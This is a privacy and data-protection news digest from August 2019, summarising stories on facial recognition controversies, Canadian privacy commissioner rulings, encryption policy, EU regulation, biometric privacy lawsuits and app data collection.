16-312 August 2019

Biometrics

US – Amazon Facial Recognition Once Again Identifies Lawmakers as Criminals

Jeff Bezos must really be getting tired of these headlines coming up all the time. It seems that their facial recognition software (known as Rekognition) has been subjected to yet another test and come up a little short. Or a lot short, particularly if you happen to be one of the more than two dozen state lawmakers who showed up as hits matching them against a database of known criminals. The “test” in question was performed by the American Civil Liberties Union (ACLU) [read blog post here] Of all the facial recognition software out there that we’ve looked at, Amazon’s seems to be the one that winds up producing the most spectacular (and frequently hilarious) epic fails when put to independent testing. In that light, perhaps the ACLU wasn’t off the mark. Of course, the ACLU isn’t looking to improve the technology. This test was run so they can continue their campaign to prevent law enforcement from using the software. Democratic Assembly member Phil Ting of San Francisco (who was tagged as a felon) is quoted as saying, “While we can laugh about it as legislators, it’s no laughing matter if you are an individual who is trying to get a job, for an individual trying to get a home. If you get falsely accused of an arrest, what happens? It could impact your ability to get employment.” These types of scare tactics are all too common and should be derided. I’ve asked multiple times now and am still waiting for an answer to one simple question. Does anyone have evidence of even a single instance where someone was misidentified by facial recognition and gone on to be prosecuted (or persecuted, as Ting suggests) because the mistake wasn’t discovered? I’ve yet to hear of a case. Did the police show up and arrest Ting after he was misidentified? I somehow doubt it. Look, the technology is still in its infancy and it’s got a few bugs in it. They’re working them out as they go. Eventually, they’ll get it up to speed and the error rates should drop down to acceptable levels. And if this software can help catch a suspect in a violent crime in a matter of minutes or hours rather than days or weeks after they were spotted by a security camera, that’s a tool that the police need to have. [Hot Air

US – Industry Groups Criticize Facial Recognition Hysteria

Some in the tech industry are pushing back on claims made recently by advocates of bans of face recognition technology. The Security Industry Association [SIA] has published a report to combat misconceptions and provide perspective on facial biometrics [see: Face Facts: Dispelling Common Myths Associated With Facial Recognition Technology here] while the Information Technology & Innovation Foundation [ITIF] has specifically addressed recent claims by the American Civil Liberties Association [read ACLU Blog post here] that one in five California legislators were misidentified by with default settings of Amazon’s Rekognition system [here] with a statement panning the organization’s methodology. “The ACLU is once again trying to make facial recognition appear dangerous and inaccurate. But independent testing from the federal government has consistently shown that facial recognition technology is highly accurate. It now exceeds the accuracy of humans at identifying faces,” comments ITIF Vice President Daniel Castro [here]. “This is the second time the ACLU has released misleading findings. Last year, it used dubious methods to claim that facial recognition had high levels of inaccuracy, but it generated false matches by setting an artificially low confidence threshold of 80 percent instead of 99 percent. The ACLU claimed at the time that companies like Amazon were not clear about what the threshold should be. That wasn’t true then, and it isn’t true now. In the past year, Amazon has repeatedly stated that any sensitive application of facial recognition, such as for law enforcement purposes, should only be using high confidence thresholds. So, for the ACLU to repeat this kind of test a year later, while apparently not changing its methods—and still refusing to share its data—is disingenuous and misleading. Claims that are not observable, testable, repeatable, and falsifiable are not science. It’s agenda-driven public relations, and policymakers should ignore it.” The pushback also comes as Big Brother Watch [here & wiki here] has published a report calling the use of facial recognition in UK shopping centers, museums, and conference venues an “epidemic” [read PR here] Biometric Update

US – Biometrics, Facial Recognition, Privacy, Security and The Law

A recent article in the L.A. Times indicated that facial recognition software proposed to be used for police bodycams falsely indicated that about 20% of California legislators were criminals (insert political joke here), just as a previous study of members of Congress showed 28 legislators “matched” a database of criminals. The use of facial recognition software on massive databases like those of bodycams or dashcams has been challenged on the basis that such software is inaccurate and might lead to the wrongful arrest or even shooting of individuals based on incorrect identification. Indeed, while many states are banning the use of such body cam facial recognition, some states such as Illinois generally prohibit the collection and use of biometric information without a written policy and informed consent. [Security Boulevard ]

US – Presidential Candidate Sanders Vows to Ban Facial-Recognition Technology

Sanders’ presidential campaign website [here], in detailing his criminal justice reform plans, proposes “banning the use of facial-recognition software for policing” in order to ensure law enforcement accountability and robust oversight policing. The criminal justice reform plan emphasises the need to “place a moratorium on the use of the algorithmic risk assessment tools in the criminal justice system until an audit is completed”. The plan also states: “We must ensure these tools do not have any implicit biases that lead to unjust or excessive sentences”. It also foresees a ban on federal programs that provide military equipment to local police forces. [Engineering and Technology]

WW – Is Webcam Facial Recognition Secure Enough?

The corporate conference room is a place for confidences, a place where the leaders of an organization should feel free to throw around ideas about a company’s future, its response to a crisis, and its plans for innovation. It should be a venue where thoughts are expressed safely in the knowledge that their contents won’t leave the room. Yet, as digital communications technologies take a more central position in these high-level discussions and remote colleagues are beamed into meetings via video conference, we are encountering new questions around privacy. Advanced features such as webcam facial recognition represent the next generation of biosecurity online, but recent video conferencing-related data breaches have raised doubts over the security of facial recognition in video conferencing technology. [VC Daily]

US – Facial Recognition: Will Passenger Scepticism Jeopardise Its Future?

Widespread distrust of the technology has begun to grip major cities in the US – mainly due to a lack of clarity about how officials use it. This led to San Francisco becoming the first city in the country to ban the use of facial recognition by city authorities and police in May 2019. Although airports run by the US Transportation Security Administration (TSA) – a federal agency – have been exempted from this ban, public scepticism of the technology is rapidly expanding to the aviation sector, leaving the industry to wonder: is facial recognition’s future in jeopardy? [Airport Technology | Facial Recognition Technology: Here Are The Important Pros And Cons]

EU – European Commission Crafting Facial-Recognition Regulations

The European Commission is exploring potential regulations focused on giving EU citizens rights regarding facial-recognition data. A commission official said “the indiscriminate use of facial recognition technology” by companies or in public would be curbed with any regulations, and people would know when any data is being used. The decision to draw up regulations comes after the U.K. Information Commissioner’s Office opened an investigation into the use of facial-recognition software at the King’s Cross development site. The regulations would also follow the EU’s commitment to create ethically based laws to govern artificial intelligence. [The Financial Times]

US – Grocery Company Claims Ill. BIPA Is Unconstitutional

The legality of the Illinois Biometric Information Privacy Act is being challenged in a Cook County Circuit Court by grocery company Albertsons. Albertsons has filed a motion claiming the law is unconstitutional, arguing that it sets up many private employers for huge judgments, while the government, its contractors and financial institutions are exempt from such issues. “If the BIPA was truly enacted to protect Illinoisans’ biometric data, to leave some of the biggest employers in the state unregulated, and thus their employees unprotected, and to allow those entities the benefit of not having to comply with the BIPA is nothing short of arbitrary,” Albertsons wrote in its motion. [Cook County Record]

Canada

CA – OPC Launches Investigation into CBSA’s Use of License-Plate-Reader System

The Office of the Privacy Commissioner of Canada has launched an investigation into the Canada Border Services Agency’s use of a compromised license-plate-reader system. The license plate system used by the CBSA was targeted in a cyberattack that impacted U.S. Customs and Border Protection. “Our office has continued to engage with CBSA and has initiated an investigation into the breach with respect to CBSA records,” OPC Spokesperson Vito Pilieci wrote in a statement. The CBSA confirmed it is in the midst of its own review to determine whether Canadian citizens were affected by the incident. [CBC.ca | CBSA launches investigation after licence plate reader linked to U.S. hack | Border agency still using licence plate reader linked to U.S. hack | US Customs and Border Protection says traveler images were taken in cyberattack | CBP says photos of U.S. travelers, license plate images were stolen in data breach | CBP says traveler photos and license plate images stolen in data breach]

CA – Police Licence-Plate Readers in Charlottetown Under Scrutiny

A Charlottetown man expressed concerns over privacy after he was hand-delivered a ticket for not having renewed his vehicle registration [read coverage]. The ticket came because a photo was taken by a license-plate reader. These concerns are echoed by David Fraser [here & blog here], a privacy lawyer at McInnes Cooper in Halifax. He’s telling Charlottetown residents they should be asking questions about how police use their personal information obtained from licence-plate readers saying people need to ask questions whenever police deploy a new technology that collects information, especially by automated means. He says “In other jurisdictions using licence-plate recognition technology has kind of come under attack from privacy regulators, for example for retaining the information for longer than is necessary” and other jurisdictions have used the information for secondary purposes like tracking individuals. Any camera system that is networked and any information stored in a database can determine a car’s movements, Fraser said. Because of that, if the database is maintained it could be used to find out where people live and work, he said. “The police tend not to be all that transparent about everything they do, and they’ll say it is for law enforcement purposes and try to end the conversation there,” Fraser said. He said similar technology has been used by private companies to do things like repossess cars and sometimes that information is sold to third parties. The readers automatically scan plates and compare them to information in a database to determine if there are any violations connected to the vehicle. Charlottetown police said all scanned plates are stored on a server for two weeks and any found in violation are stored for three months. Charlottetown police have been using automatic licence-plate readers on two of their vehicles for the last year. Charlottetown Coun. Bob Doiron, who also chairs the protective services committee, said he doesn’t think Charlottetown police using automatic licence-plate readers is a privacy issue, but is open to having a discussion about the devices. [CBC News | Police licence-plate readers don’t concern Charlottetown councillor after privacy complaint | Police licence-plate readers raise privacy concerns for Charlottetown driver]

CA – Political Parties Yet to Take Privacy Measures Beyond Bill C-76

How have political parties responded since Bill C-76 went into effect? The bill requires political parties to post privacy policies onto their websites that state what types of information they collect and how it is collected and protected. All the parties have adhered to Bill C-76; however, they also have not implemented any of Privacy Commissioner of Canada Daniel Therrien’s voluntary privacy measures, such as giving citizens’ access to their data and being more transparent about how personal data is used. Privacy and Access Council of Canada President Sharon Polsky said political parties are only paying lip service to the notion of protecting privacy by only following the requirements of Bill C-76. [The Canadian Press | Federal parties subject to B.C. privacy laws: watchdog | Canada’s Political Parties Won’t Say What They Know about You | Federal parties’ privacy policies meet bare minimum required by new law | Canada’s political parties don’t meet voters’ privacy expectations: OpenMedia report | What’s in your file? Federal political parties don’t have to tell you]

CA – Federal Parties Subject to B.C. Privacy Laws: BC OIPC

Federal political parties may soon face scrutiny over how they collect and use personal information about Canadian voters. In a recent ruling, B.C. privacy commissioner Michael McEvoy [read Order P19-02, 30 pg PDF here] declared he has jurisdiction to investigate how two B.C. residents’ private emails ended up on the federal NDP’s mailing list. There are no rules or oversight into how federal parties collect, store and analyze Canadians personal information. While federal parties have repeatedly downplayed the level of details they collect on individual citizens, Canadians can only take them at their word; there is no independent oversight. The major exception is B.C., where the province’s privacy commissioner can investigate provincial parties’ use of personal information. According to the ruling, McEvoy’s office received a complaint from two residents in the B.C. riding of Courtenay-Alberni in April 2018. The complainants were concerned after they received an email invitation to a meet-and-greet with Jagmeet Singh in their riding. They asked the party how it had obtained their email addresses. Eight months later, the NDP responded. McEvoy’s ruling only addressed the question of whether he had jurisdiction to investigate the federal NDP’s data operations, not the substance of the complaint, itself. The ruling can also be appealed. McEvoy’s office said they could not comment on the ruling, as their investigation is continuing. It’s unlikely that any final ruling from McEvoy’s office will come before the upcoming federal election campaign. While basic information such as email addresses and phone numbers may seem innocuous, political campaigns are increasingly focused on developing data and digital operations to refine their political outreach and advertising. [The Star | Decision paves the way for federal riding associations in BC to be subject to BC’s data protection laws | Federal Political Parties Must Follow BC’s Privacy Law, Commissioner Rules | NDP leader invite spurred privacy complaint | Federal politicians could soon face B.C. privacy watchdog over party databases]

CA – OPC Publishes New Privacy Activity Sheets for Kids

The Office of the Privacy Commissioner of Canada, in collaboration with its provincial and territorial counterparts, has produced a new series of activity sheets to help young Canadians understand various privacy issues by presenting them in a visually appealing, easy-to-understand format [download here]. It is important that youth become savvy digital citizens who are able to enjoy the benefits of being online. Young people need to be equipped with the knowledge necessary to navigate the online world and participate in the digital domain while protecting their privacy. Because children go online earlier than ever before, parents and guardians should start talking to them about the digital world and online privacy much sooner than they used to [Here is a sample of four of the nine activity sheets]: 1) Privacy Snakes and Ladders [see 2 pg PDF here] is a twist on the classic children’s game that helps players learn how to make smart privacy choices by climbing up a ladder when they make a good decision or sliding down a snake because they have shared a password with a friend, for example; 2) Connect the Dots [see 2 pg PDF here] has kids complete the picture of a family with a checklist of rules they can use at home to practice good online privacy; 3) Learning About Passwords and Colour the Tablet [read 2 pg PDF here] challenges kids to create their own strong, eight-character password by filling in the blanks. It also asks them to draw a lock on a tablet, representing how password protects an electronic device; and 4) Word Search [read 2 pg PDF here] introduces children to privacy vocabulary by having them comb through a puzzle to find words such as “post,” “click” and “footprint.” To download the activity sheets or for more activities and information, visit www.youthprivacy.ca .[ News and announcements (Office of the Privacy Commissioner of Canada) | ‘Kids these days lead parallel online lives’: Alberta unveils online privacy lessons for kids]

CA – NS OIPC: Energy Dept Violated ‘Almost Every Provision’ of Access Law

Nova Scotia Information and Privacy Commissioner Catherine Tully said the province’s Energy Department violated “almost every provision” of the Freedom of Information and Protection of Privacy Act after releasing her office’s findings on an FOI request. Tully criticized the department for the length of time it took to complete the request. A citizen first made the inquiry into records on a pair of companies back in 2014. The commissioner also pointed to the department withholding 832 pages of documents when it finally fulfilled the probe. “This may have been a failure to conduct an adequate search or it may have been a failure to respond openly, accurately and completely,” Tully wrote in the report. “In either case, it was not in compliance with the law.” [CBC News]

Consumer

WW – Sharing Pet Photos Can Reveal Personal Information

While people are becoming more vigilant about sharing personal information about themselves, particularly on social media, they routinely forget to block their contact information when sharing pet photos. Sharing a pet photo is innocuous unless the pet owner’s phone number and address that appear on the pet tag is visible. That phone number can be used to reset online passwords, and it is a key identifier in public databases containing relevant information about the pet owner, including name, address and even the names of family members. [Gizmodo]

E-Government

CA – B.C. Auditor General Rates Provincial Government’s Cyber Security

If your client has a formal process to disable computer network access for employees and contractors who no longer work there, that client’s cybersecurity is better in at least one respect than some of British Columbia government departments. The province’s Office of the Auditor General [Carol Bellringer: see here] recently audited five government departments on how well they follow controls set by the Office of the Chief Information Officer’s (OCIO) to restrict unauthorized access to computer data, the Auditor General’s office said in the report released Aug. 13 [read PR here, watch 4:48 min Video Statement here & 27 pg PDF report here]. With its Internal Directory and Authentication Service (commonly known as IDIR), the B.C. government gives user accounts to employees and contractors so they can log on to workstations and access online services. The audit found that for 538 IDIR accounts still in use, the corresponding user’s employment status was “non-active.” The audit did not go so far as to look for inappropriate use of accounts or actual security breaches that could result from improper accounts. The audit asked whether the ministries were formally reviewing employees’ and contractors’ IDIR access rights at regular intervals to ensure their access rights are current and valid. The answer for all – except the corporate accounting services branch of the Ministry of Finance – was no. “Users that should no longer have access may still have access to government computer resources and information. This could result in unauthorized access and sensitive information being used for fraudulent activities,” the Office of the Auditor General said in the report. “Keeping electronic data safe requires a robust method for identifying users, determining what they can access and then controlling access appropriately” The B.C. government collects sensitive information such as personal health records, social insurance numbers, birth records, and personal and government financial information. “Even a single poorly managed IDIR account could lead to fraud or to compromised government information and systems,” the Office of the Auditor General wrote. [Canadian Underwriter | B.C. government information controls inconsistent: auditor general | Government accepts all recommendations of OAG audit of internal directory account management]

WW – Report Shows Spike in Unlawful Data Use, Access by Chinese Apps

A new half-year study in China has revealed that a large portion of mobile apps are illegally using and accessing personal information. National Computer Network Emergency Response Technical Team/Coordination Center of China analyzed 1,000 Chinese apps, each requiring an average of 25 permissions, while 30% of apps demand access to call logs despite that data being unrelated to their operations. The apps also averaged 20 collected data items relating to individuals or their devices, including chat logs and location data. [Caixin Global]

Electronic Records

WW – IAB Releases Second Iteration of Transparency and Consent Framework

IAB Europe and IAB Tech Lab have published the second version of the Transparency and Consent Framework. The latest iteration comes after the Interactive Advertising Bureau sought feedback on the framework in April. A group of 55 organizations and 10 national IAB chapters worked to draft the new version of the guide. The second TCF increases the number of purposes publishers and vendors can process personal data from five to ten and updates the legitimate interest for processing personal data. “It was essential that the evolution of the framework was handled sensitively, with the final specifications able to be adopted in a manner consistent with differing business models in a wide range of operational markets,” IAB Europe CEO Townsend Feehan said. [The Drum]

Encryption

CA – Canada’s New and Irresponsible Encryption Policy (Opinion)

[This well researched six thousand word essay documents] how the Government of Canada’s new encryption policy threatens Charter rights, cybersecurity, economic growth, and foreign policy. The Government of Canada has historically opposed the calls of its western allies to undermine the encryption protocols and associated applications that secure Canadians’ communications and devices from criminal and illicit activities. In particular, over the past two years the Minister of Public Safety, Ralph Goodale, has communicated to Canada’s Five Eyes allies that Canada will neither adopt or advance an irresponsible encryption policy that would compel private companies to deliberately inject weaknesses into cryptographic algorithms or the applications that facilitate encrypted communications. This year, however, the tide may have turned, with the Minister apparently deciding to adopt the very irresponsible encryption policy position he had previously steadfastly opposed. To be clear, should the Government of Canada, along with its allies, compel private companies to deliberately sabotage strong and robust encryption protocols and systems, then basic rights and freedoms, cybersecurity, economic development, and foreign policy goals will all be jeopardized. This article begins by briefly outlining the history and recent developments in the Canadian government’s thinking about strong encryption. Next, the article showcases how government agencies have failed to produce reliable information which supports the Minister’s position that encryption is significantly contributing to public safety risks. After outlining the government’s deficient rationales for calling for the weakening of strong encryption, the article shifts to discuss the rights which are enabled and secured as private companies integrate strong encryption into their devices and services, as well as why deliberately weakening encryption will lead to a series of deeply problematic policy outcomes. The article concludes by summarizing why it is important that the Canadian government walk back from its newly adopted irresponsible encryption policy. [Transparency and Accountability (The Citizens Lab) SEE ALSO: Australia’s data encryption laws an oppression of freedom: Joseph Carson | U.K. Home Secretary warns about Facebook potentially encrypting Messenger | Five Eyes nations demand access to encrypted messaging | Privacy concerns over Five Eyes plan to open up private messages | Five Eyes alliance calls for access to encrypted Facebook messages | Facebook is threatening to hinder police by increasing encryption, warns Priti Patel | Calls for backdoor access to WhatsApp as Five Eyes nations meet | WhatsApp And Other Encryption Under Threat After ‘Five Eyes’ Demand Access | ‘Illegitimate’ internet use under the microscope at Five Eyes meeting: Goodale]

EU Developments

EU – Spanish Supreme Court Deems Electric-Use Info to Be Personal Data

The Contentious-Administrative Chamber of the Spanish Supreme Court ruled information gathered via an individual’s use of electricity constitutes personal data. The court determined data is protected by the Organic Law 3/2018, of December 5, on the Protection of Personal Data and the Guarantee of Digital Rights when it is accessed by a third party, such as an employee tasked with the measurement of electrical activity. The ruling stems from an appeal made by the electric utility company Iberdrola against a Secretary of State for Energy resolution that gave staff members the ability to transfer billing and liquidation information. (Original article is in Spanish.) [Confidencial Judicial]

EU – Facebook Confirms EU Citizens’ Data Transcribed in Audio Capture

EU regulators may open new privacy investigations into Facebook after EU citizens’ data showed up in the social network’s audio transcriptions. Facebook initially reported no EU users were involved in the transcriptions, but it has now revealed 48 EU users had audio messages collected and transcribed by hundreds of third-party contractors. Such nonconsensual data collections may violate the EU General Data Protection Regulation. “All EU supervisory authorities in whose jurisdiction data protection violations against persons who have used Facebook Messenger have occurred are responsible for investigating the respective violations,” Hamburg Commissioner for Data Protection Johannes Caspar said, adding that cases will be taken over by respective national data protection authorities. [Politico]

UK – ICO Discusses Data Minimization, Privacy-Preserving Tactics for AI

The U.K. Information Commissioner’s Office has published a blog post to better inform the public on data minimization and privacy-preserving techniques related to artificial intelligence systems. The post from AI Research Fellow Reuben Binns and Technology Policy Adviser Valeria Gallo is part of the ICO’s call for feedback on its AI Auditing Framework. In the piece, Binns and Gallo break down what organizations may face when adopting AI systems, as well as provide the techniques to meet data minimization requirements set forth in the framework. [Source]

Facts & Stats

WW – Data Breaches Hit Record High in First Half of 2019

The number of exposed data records this year has 2019 on track “to be the worst year on record for data breach activity.” In a recent survey, 2019 MidYear QuickView Data Breach Report, conducted by Risk Based Security, 4.1 billion records have been exposed in data breaches so far this year, with 3,813 incidents publicly reported — up 54% from this time last year. Three breaches have made the top 10 list of largest breaches of all time and affected more than 100 million records. Email addresses and passwords were exposed in approximately 70% and 65% of reported breaches, respectively. [Threatpost]

Finance

EU – EU Regulators Launch Investigation into Libra Cryptocurrency

Regulators in the European Union have launched an investigation into Facebook’s Libra cryptocurrency. The European Commission sent questionnaires as part of a preliminary information-gathering exercise to those involved with the project, per a pair of sources close to the situation. According to documents seen by Bloomberg, the commission “currently investigating potential anti-competitive behaviour” over concerns of “possible competition restrictions” through the use of consumer data. The investigation comes after regulators from around the world asked Facebook for answers on the privacy concerns surrounding the cryptocurrency. The commission and Facebook did not comment on the probe. [Financial Times]

FOI

CA – ON OIPC Orders Government of Ontario to Share Mandate Letters

Ontario’s freedom of information law [here, here & wiki here] is based on the principle that every individual has a right to access government information. This right exists to ensure the public has the information it needs to participate meaningfully in the democratic process, and that politicians and bureaucrats remain accountable to the public. There are, understandably, some necessary exceptions to the law. Those exceptions, written into the Freedom of Information and Protection of Privacy Act as “exemptions,” are designed to strike a balance between Ontarians’ fundamental right to know and the privacy and safety of individuals. They are also meant to be limited and specific. Labour relations, solicitor-client, and certain law enforcement records are examples of information that may be exempt from disclosure. The law also allows (rightly so) for the Premier and his cabinet to engage in free discussion of sensitive issues, in private. As such, cabinet documents cannot be disclosed if they reveal the substance of deliberations of the Executive Council or its committees. Order PO-3973, which I issued on July 15 [see 37 pg PDF here], dealt with a request for the mandate letters sent by Premier Ford [here & wiki here] to all Ontario government ministers. Cabinet Office denied access to the letters based on the premise that, as cabinet documents, they are automatically exempt from disclosure. Mandate letters have become common across Canada as a means to provide direction to ministers of incoming governments. They are frequently made public. After reviewing the mandate letters, I determined that they do not reveal government deliberations, the substance of any meetings, discussions, or any other options considered by the Premier’s Office. That is why I found that the exemption did not apply, and in Order PO-3973, I directed Cabinet Office to disclose the letters by August 16. The purpose of our freedom of information law is to support the public’s ‘right to know.’ Unless government records are exempt, they should be disclosed to the public. In this case, the mandate letters do not qualify for exemption as cabinet documents. I ordered their release because Ontarians have a right to know what the government’s policy priorities are. On August 14, my office received notice that the government intends to challenge my decision in court and prevent the release of the letters. Because it is now subject to a judicial review, I will not comment further on Order PO-3973, except to say that I stand by my decision, and hope to see a swift resolution. [Information and Privacy Commissioner of Ontario Blog | Ontario fights order to release documents outlining cabinet minister priorities | Ford government sues privacy commissioner to block release of cabinet letters]

CA – Names of City Staff Who Get Bonuses Should Be Public: NS OIPC

Halifax Regional Municipality should release the names of employees who receive bonuses and the amounts of the awards, says provincial Information and Privacy Commissioner Catherine Tully [see here]. The municipality had argued that disclosure of the names of the employees and their corresponding bonus amounts would be an “unreasonable invasion” of the employees’ personal privacy. Tully concluded in her August 22 report [read REVIEW REPORT 19-07 – 8 pg PDF here] that “The public has the right to know the amount of bonuses paid to individuals even though the disclosure reveals personal information of those individual employees.” Tully said the law is intended to both protect personal privacy and to promote transparency and accountability. Tully’s report also says: “The law includes rules on how to evaluate the balance between these two interests. With respect to performance-based payments to municipal employees, the law makes clear that the balance falls in favour of accountability and transparency. I find the annual individual salary adjustment increases based on performance are bonuses or rewards and as such fall within the meaning of remuneration. HRM has provided no argument or evidence that the (bonus) payments do not fit this definition.” However Tully also found that disclosure of the individual salary adjustment increases “would not be an unreasonable invasion” of employees’ personal privacy. … The municipality could appeal to the Nova Scotia Supreme Court. [The ChronicleHerald]

CA – Yukon OIPC Rules PSC Correctly Handled Access-to-Info Request

Yukon Information and Privacy Commissioner Diane McLeod-McKay ruled the Public Service Commission correctly handled an access-to-information request. An applicant sought information about a PSC employee from between Nov. 20, 2017, and June 30, 2018. The PSC refused to confirm or deny the existence of the records under Section 13(2)(c) of the Access to Information and Protection of Privacy Act, a decision McLeod-McKay found to be the correct one. “Looking at the [ATIPP Act] as a whole, and its purposes, it is clear that exceptions to access to information are carefully crafted to limit access only as much as necessary to protect certain interests,” McLeod-McKay said in an interview on the decision. [Yukon News]

Genetics

US – Genetic Privacy in Question with Law Enforcement’s Use of DNA Tests

Privacy advocates are taking issue with FamilyTreeDNA allowing law enforcement to use the 1.5 million records in the company’s genetic database without a warrant or proper consent from users. “Taking a DNA test does not just tell a story about me. DNA tests inevitably reveal information about many other people too, without their consent,” University of Maryland Francis King Carey School of Law Associate Professor Natalie Ram said. “Should genetic databases be allowed to make up the rules as they go along?” Meanwhile, Government Technology reports on the growing privacy concerns with increased use of facial-recognition software in U.S. airports. [The Wall Street Journal]

Health / Medical

US – ONC Working with Congress, White House on Health Care App Privacy

The U.S. Office of the National Coordinator for Health Information Technology is working with Congress and the White House on app privacy for patients. Health care groups have raised concerns about patients using third-party apps not protected by the Health Insurance Portability and Accountability Act as their data may be used in ways they are not aware of, “such as by monetizing it or using it to target advertisements,” according to the report. ONC CEO Donald Rucker said they are working with “a number of folks on better ways of doing consent” to ensure patients are aware of possible secondary uses of data, adding “most patients are actually going to be as protective of their medical information as they are of their banking information.” [Modern Healthcare]

US – Survey: Patients Trust Health Care Agencies the Most to Protect Data

A recent survey from Harvard T.H. Chan School of Public Health and Politico found that Americans trust health care and banking institutions to protect their personal data. Of the 1,009 respondents, 75% ranked health care organizations the highest when it comes to protecting personal data, despite 32 million breached health care data records this year, while social media companies and internet search engines ranked last with 10%. “Broadly, while many Americans express serious misgivings about data privacy when it comes to social media sites and internet search engines, they report substantially more trust that their private health information will remain secure,” the researchers wrote. [HealthITSecurity]

Identity Issues

EU – Irish DPC Orders End to Processing of 3.2M Citizens’ Data Tied to Public Services Cards

The Irish Data Protection Commission has ordered the Department of Social Protection to stop all processing of the personal information of 3.2 million citizens in connection to its issuance of Public Services Cards, where PSCs are issued solely for individual transactions with other public bodies. The DPC found there is no legal basis for State agencies to require citizens to have a PSC to access services, such as renewing a driver’s license or obtaining a passport. The Irish Times reports Commissioner Helen Dixon anticipates her report will give rise to public questions about the PSC card. The Fianna Fáil party has called on the DPC to release all its findings from the investigation. [DataProtection.ie]

WW – Noise-Exploitation Attack May Break Through Differential Privacy Methods

Researchers from Imperial College London and Université Catholique de Louvain discovered a noise-exploitation attack to break through query-based databases that use aggregation and noise to mask personal data. Imperial College London Assistant Professor and co-author of the research paper Yves-Alexandre de Montjoye said a party could exploit differential privacy should they send enough queries to eventually figure out “every single thing that exists in the database because every time you give me a bit more information. We start from one query and then we do a variation of it and by studying the differences between the queries we know that some of the noise will disappear, some of the noise will not disappear and by studying noise that does not disappear basically we figure out the sensitive information.” [TechCrunch]

US – More Ill. Employers Accused of Violating BIPA With Fingerprint Scans

Two class-action suits have been filed in Cook County Circuit Court alleging employers violated the Illinois Biometric Information Privacy Act by requiring fingerprint scans for employees. The first case involves Bolingbrook-based D&D Manufacturing, which is accused of installing the biometric time clock without due notice to employees, who also did not authorize the use of their fingerprints. The second suit against Whole Foods Market Group alleges that the identities of employees at a River Forest location were at risk from the use of a similar biometric time clock. [The Cook County Record]

US – Defendants Seek Dismissal of Privacy Suit Over EHRs

Google and the University of Chicago Medical Center have filed a motion to dismiss a class-action suit over allegations related to deidentified electronic health records. In their motion to a federal court in Illinois, Google and the medical center argued their collaboration and patient data sharing were in compliance with the Health Insurance Portability and Accountability Act. They also claimed that their data sharing did not cause the plaintiffs any harm. The initial complaint by the plaintiffs alleged the data sharing involved date stamps of when patients checked in and out of the hospital, which Google could trace back to patients. [GovInfoSecurity]

Intellectual Property

WW – Developers Accuse Apple of Anti-Competitive Behavior With Its Privacy Changes in iOS 13

A group of app developers have penned a letter to Apple CEO Tim Cook, arguing that certain privacy-focused changes to Apple’s iOS 13 operating system [see here & wiki here] will hurt their business. Evidently the developers accused Apple of anti-competitive behavior when it comes to how apps can access user location data. With iOS 13, Apple aims to curtail apps’ abuse of its location-tracking features as part of its larger privacy focus as a company. Today, many apps ask users upon first launch to give their app the “Always Allow” location-tracking permission. Users can confirm this with a tap, unwittingly giving apps far more access to their location data than is actually necessary, in many cases. In iOS 13, however, Apple has tweaked the way apps can request location data. There will now be a new option upon launch presented to users, “Allow Once,” which allows users to first explore the app to see if it fits their needs before granting the app developer the ability to continually access location data. This option will be presented alongside existing options “Allow While Using App” and “Don’t Allow.” The “Always” option is still available, but users will have to head to iOS Settings to manually enable it. (A periodic pop-up will also present the “Always” option, but not right away.) The app developers argue that this change may confuse less-technical users, who will assume the app isn’t functioning properly unless they figure out how to change their iOS Settings to ensure the app has the proper permissions The letter was signed by Tile CEO CJ Prober; Arity (Allstate) president Gary Hallgren; CEO of Life360, Chris Hullsan; CEO of dating app Happn, Didier Rappaport; CEO of Zenly (Snap), Antoine Martin; CEO of Zendrive, Jonathan Matus; and chief strategy officer of social networking app Twenty, Jared Allgood. It’s another example of how erring on the side of increased user privacy can lead to complications and friction for end users. One possible solution could be allowing apps to present their own in-app Settings screen, where users could toggle the app’s full set of permissions directly — including everything from location data to push notifications to the app’s use of cellular data or Bluetooth sharing. [TechCrunch

Developers Call Apple Privacy Changes Anti-Competitive ]

Internet / WWW

CN – Chinese Regulator Says Apps Are Collecting Excessive Personal Data

China’s National Computer Network Emergency Response Technical Team has told app operators to reevaluate the types and amounts of personal data being collected from users. The regulator noted in its half-year report that apps were found to be over-collecting personal data, which is a problem that needs immediate attention. “A large number of apps exhibit abnormal behavior, such as detecting other apps or reading and writing user device files, posing a potential security threat to the user’s information security,” the report stated. The call for rectification comes as China’s digital servicescontinues to grow and becomes more susceptible to data privacy issues. [Tech in Asia]

WW – Google Shutters Mobile Insights Service Over Privacy Concerns

Google has shut down its Mobile Network Insights service over privacy concerns. The service was used to show wireless carriers the strength of their signals around the world through the use of data collected via Android devices. Google only used data from users who opted into sharing location data and did not contain any identifying information; however, the tech company still decided to shutter the service over concerns of regulatory scrutiny, according to sources close to the decision. Google also released the results of a survey in which it found hackers use “password-spraying” attacks due to online patrons’ continued use of the same password, even when it was compromised in a previous instance. [Reuters]

WW – Apple to Make App Store Changes to Protect Children’s Privacy

Apple plans to implement new rules for its App Store in an effort to protect children’s privacy. The tech company plans to ban any app targeted to children from using external analytics software to monitor who interacts with an app and how. Developers have raised issues about the impact the changes will have on their business models, as well as whether it will expose children to more adult apps. In response to those concerns, Apple said it will delay the rule change for now. “We aren’t backing off on this important issue, but we are working to help developers get there,” Apple Spokesman Fred Sainz said in a statement. [The Washington Post]

Law Enforcement

US – Calif. Supreme Court Expands Rules on Police Officer Disclosures

Police officers will see their right to privacy lose weight in court cases following a decision by the California Supreme Court. Justices overruled a lower court decision that the Los Angeles County Sheriff’s Department was prohibited from giving prosecutors the names of deputies accused of improper conduct. California has previously been tight on officer privacy, but a new law requires more public disclosure of police misconduct. Law enforcement unions have been unsuccessful in arguing that the law shouldn’t be retroactive to include previous cases of misconduct prior to the new law taking effect. [CBS San Francisco]

Online Privacy

WW – Malicious Websites Secretly Hackrf into iPhones for Years, Says Google

